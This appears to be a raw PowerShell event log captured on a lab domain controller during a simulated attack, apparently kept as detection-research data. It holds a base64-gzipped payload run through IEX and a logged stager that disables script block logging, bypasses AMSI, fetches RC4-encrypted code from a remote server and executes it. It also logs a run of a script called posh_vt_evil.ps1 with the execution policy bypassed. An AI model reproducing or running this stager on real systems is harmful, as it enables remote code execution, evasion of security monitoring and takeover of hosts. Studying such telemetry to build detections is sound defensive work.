$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("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"));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();

ScriptBlock ID: cb4d3c2c-97a4-424a-a8af-642d18d57d76
Path:
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476764
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476763
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 5144 in AppDomain: DefaultAppDomain.
06/15/2021 05:02:20 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476762
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:02:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476819
Keywords=None
Message=Started invocation of ScriptBlock ID: 239bfd5f-5a30-4d06-9b97-9833476dbdbb
Runspace ID: a7f1f87a-d46d-4fba-8fa8-c3215d2a667b
06/15/2021 05:02:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476818
Keywords=None
Message=Creating Scriptblock text (1 of 1):
IF($PSVerSiONTable.PSVersioN.MajoR -gE 3){$C322=[Ref].AsSemBLY.GETTYPE('System.Management.Automation.Utils')."GetFIE`lD"('cachedGroupPolicySettings','N'+'onPublic,Static');If($C322){$c742=$C322.GeTVALue($NULl);If($C742['ScriptB'+'lockLogging']){$C742['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;$c742['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}$vAL=[CoLLeCTIONs.GeNERiC.DicTioNary[strinG,System.OBjEct]]::nEW();$VAl.Add('EnableScriptB'+'lockLogging',0);$Val.Add('EnableScriptBlockInvocationLogging',0);$c742['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']=$val}Else{[SCriPtBLocK]."GEtFIe`LD"('signatures','N'+'onPublic,Static').SEtValuE($Null,(New-OBJEct COLlECtionS.GenerIC.HAshSEt[StrINg]))}$ReF=[ReF].AsSeMbLY.GeTTyPe('System.Management.Automation.Amsi'+'Utils');$REf.GetFIeld('amsiInitF'+'ailed','NonPublic,Static').SeTVALuE($nULL,$TRUe);};[SysTeM.NEt.SerVIcePoIntMANagER]::EXpECT100CONtinuE=0;$5793=NeW-ObJecT SysTEm.NEt.WebClieNT;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$ser=$([TEXt.ENcoDiNG]::UNICOdE.GeTStRINg([CoNvERt]::FRoMBase64STRING('aAB0AHQAcAA6AC8ALwAzADQALgAyADEAOAAuADIAMwA1AC4AMgAxADkAOgA4ADAAOAAwAA==')));$t='/news.php';$5793.HEaDeRS.ADd('User-Agent',$u);$5793.PROXY=[SYsTEM.NEt.WeBRequEST]::DEFAuLtWEbProXY;$5793.PRoxy.CredenTiAls = [SYstem.NET.CREDenTiALCAche]::DEfAuLtNEtWORKCREDeNtiaLS;$Script:Proxy = $5793.Proxy;$K=[SySTem.TeXT.ENCoDinG]::ASCII.GetBYtes('Jf9z_?P}~Zu-,n;IN/A|#5%!>^ghsl2{');$R={$D,$K=$ARGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.CoUnT])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-BxOr$S[($S[$I]+$S[$H])%256]}};$5793.HeAdErS.Add("Cookie","gHVlcrmdCWJeODGi=8AZFxuwcMahdbNHhHSY+a43LiiE=");$dATa=$5793.DoWnLOadDaTa($sER+$t);$iv=$DatA[0..3];$daTA=$DATA[4..$daTA.lenGTH];-JoIN[ChAr[]](& $R $daTA ($IV+$K))|IEX

ScriptBlock ID: 239bfd5f-5a30-4d06-9b97-9833476dbdbb
Path:
06/15/2021 05:02:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476817
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:02:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476816
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 8020 in AppDomain: DefaultAppDomain.
06/15/2021 05:02:22 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476815
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476836
Keywords=None
Message=Completed invocation of ScriptBlock ID: f98143fc-5f4e-4228-a665-f3e839b3b705
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476835
Keywords=None
Message=Started invocation of ScriptBlock ID: f98143fc-5f4e-4228-a665-f3e839b3b705
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476834
Keywords=None
Message=Completed invocation of ScriptBlock ID: da1a7d56-ae6f-45e1-b274-f63feafbd0f6
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476833
Keywords=None
Message=Started invocation of ScriptBlock ID: da1a7d56-ae6f-45e1-b274-f63feafbd0f6
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476832
Keywords=None
Message=Completed invocation of ScriptBlock ID: 8778ab18-0d27-4dd2-b9e2-71b89599967c
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476831
Keywords=None
Message=Started invocation of ScriptBlock ID: 8778ab18-0d27-4dd2-b9e2-71b89599967c
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476830
Keywords=None
Message=Completed invocation of ScriptBlock ID: 88eb3ab1-391f-4b43-8e04-d67e9c7c830a
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476829
Keywords=None
Message=Started invocation of ScriptBlock ID: 88eb3ab1-391f-4b43-8e04-d67e9c7c830a
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476828
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4f69fbf6-5425-443c-9e6e-c7147eae8f7c
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476827
Keywords=None
Message=Started invocation of ScriptBlock ID: 4f69fbf6-5425-443c-9e6e-c7147eae8f7c
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476826
Keywords=None
Message=Completed invocation of ScriptBlock ID: 958a4950-b236-4a4a-bb90-33acece6ae7f
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476825
Keywords=None
Message=Started invocation of ScriptBlock ID: 958a4950-b236-4a4a-bb90-33acece6ae7f
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476824
Keywords=None
Message=Started invocation of ScriptBlock ID: 20773d1f-bca3-48a9-9380-8d60d0224b4a
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=3
Type=Warning
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476823
Keywords=None
Message=Creating Scriptblock text (1 of 1):
if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Users\Administrator\Desktop\posh_vt_evil.ps1'

ScriptBlock ID: 20773d1f-bca3-48a9-9380-8d60d0224b4a
Path:
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1476822
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1476821
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6740 in AppDomain: DefaultAppDomain.
06/15/2021 05:02:57 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1476820
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476858
Keywords=None
Message=Completed invocation of ScriptBlock ID: d56ba7b9-c534-417e-974e-af06aa537869
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476857
Keywords=None
Message=Started invocation of ScriptBlock ID: d56ba7b9-c534-417e-974e-af06aa537869
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476856
Keywords=None
Message=Creating Scriptblock text (1 of 1):
$global:?

ScriptBlock ID: d56ba7b9-c534-417e-974e-af06aa537869
Path:
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476855
Keywords=None
Message=Completed invocation of ScriptBlock ID: 20773d1f-bca3-48a9-9380-8d60d0224b4a
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476854
Keywords=None
Message=Completed invocation of ScriptBlock ID: b8059e10-bd2e-4cea-8637-dced20a64566
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476853
Keywords=None
Message=Completed invocation of ScriptBlock ID: 4c123f53-4b31-4705-9771-8bc9463b142a
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476852
Keywords=None
Message=Started invocation of ScriptBlock ID: 4c123f53-4b31-4705-9771-8bc9463b142a
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476851
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.OriginInfo }

ScriptBlock ID: 4c123f53-4b31-4705-9771-8bc9463b142a
Path:
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476850
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ad692c-9260-4864-8c55-a6302fffd7c1
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476849
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ad692c-9260-4864-8c55-a6302fffd7c1
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476848
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $_.ErrorCategory_Message }

ScriptBlock ID: b1ad692c-9260-4864-8c55-a6302fffd7c1
Path:
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476847
Keywords=None
Message=Completed invocation of ScriptBlock ID: cba7ae51-8562-441c-bcdb-dca872c51cc0
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476846
Keywords=None
Message=Completed invocation of ScriptBlock ID: 54237f90-06a6-4451-ba91-3774e29acc6f
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1476845
Keywords=None
Message=Completed invocation of ScriptBlock ID: e13a9c90-a71f-4b0f-aeed-d35eea667160
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1476844
Keywords=None
Message=Started invocation of ScriptBlock ID: e13a9c90-a71f-4b0f-aeed-d35eea667160
Runspace ID: d9d4f3fd-f37d-48a1-b5d5-7084538e7ff6
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1476843
Keywords=None
Message=Creating Scriptblock text (1 of 1):
{ Set-StrictMode -Version 1; $this.Exception.InnerException.PSMessageDetails }

ScriptBlock ID: e13a9c90-a71f-4b0f-aeed-d35eea667160
Path:
06/15/2021 05:03:00 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
